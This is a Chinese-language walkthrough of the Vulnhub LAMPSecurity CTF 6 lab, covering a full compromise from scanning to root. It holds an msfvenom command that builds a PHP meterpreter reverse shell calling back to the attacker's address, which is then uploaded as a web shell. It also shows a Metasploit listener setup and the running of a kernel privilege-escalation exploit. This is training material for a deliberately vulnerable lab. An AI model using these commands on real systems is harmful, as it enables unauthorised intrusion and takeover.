【Vulnhub-LAMPSecurity】CTF 6

0x00环境

攻击机IP:192.168.1.28
目标机IP:192.168.1.24

0x01实战

端口扫描

nmap -sV -p- 192.168.1.24

【Vulnhub-LAMPSecurity】CTF 6

可以看到开放了很多端口

目录扫描

扫描出一堆东西
【Vulnhub-LAMPSecurity】CTF 6

漏洞发现

根据扫描出来的目录查找发现

直接可以看到phpinfo
【Vulnhub-LAMPSecurity】CTF 6

可以访问db.sql文件,直接得到数据库账户和密码
【Vulnhub-LAMPSecurity】CTF 6

等还有其它的一些东西就不列举了。。。

漏洞利用

访问80端口HTTP服务可以知道本网站由Toby Victor开发。它由PHP和MySQL提供支持,并托管在CentOSlinux 服务器上。
【Vulnhub-LAMPSecurity】CTF 6

尝试使用上面得到的账户admin/adminpass登录网站
【Vulnhub-LAMPSecurity】CTF 6

成功登录,登录后我们可以发现我们可以编辑页面并上传图片
【Vulnhub-LAMPSecurity】CTF 6

而且前面我们在网站主页得知是支持PHP的,那么我们可以尝试上传木马文件反弹shell

创建PHP木马文件尝试通过文件上传来上传

msfvenom -p php/meterpreter/reverse_tcp -o /root/shell.php  lhost=192.168.1.28 lport=4444

【Vulnhub-LAMPSecurity】CTF 6

尝试上传,如果失败再尝试绕过
【Vulnhub-LAMPSecurity】CTF 6

在主页可以看到上传成功
【Vulnhub-LAMPSecurity】CTF 6

创建监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.28
set lport 4444
run

【Vulnhub-LAMPSecurity】CTF 6

在主页上点击Read more即可反弹shell

【Vulnhub-LAMPSecurity】CTF 6
【Vulnhub-LAMPSecurity】CTF 6

提权

查看系统信息

sysinfo

不知为何无法执行命令
【Vulnhub-LAMPSecurity】CTF 6

使用老版kali(192.168.1.12)
【Vulnhub-LAMPSecurity】CTF 6

内核版本为2.6.18-92.el5,在互联网查漏洞利用https://www.exploit-db.com/exploits/8478
【Vulnhub-LAMPSecurity】CTF 6

将提权脚本下载并查看
【Vulnhub-LAMPSecurity】CTF 6

将dos格式修改为linux格式

dos2unix 8478.sh

【Vulnhub-LAMPSecurity】CTF 6

上传到靶机上的tmp目录中
【Vulnhub-LAMPSecurity】CTF 6

赋予脚本执行权限并执行

chmod +x 8478.sh

【Vulnhub-LAMPSecurity】CTF 6

报错,因为必须为脚本提供正确的 PID 才能使代码正常工作。所以现在我们必须找到一个合适的 PID,并在该 PID 的帮助下运行脚本

cat /proc/net/netlink

【Vulnhub-LAMPSecurity】CTF 6

执行脚本,多尝试几次,成功得到root权限

./8478.sh 568

【Vulnhub-LAMPSecurity】CTF 6
【Vulnhub-LAMPSecurity】CTF 6

上一篇:合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)


下一篇:2021西湖论剑 Reverse(Re) Writeup(WP)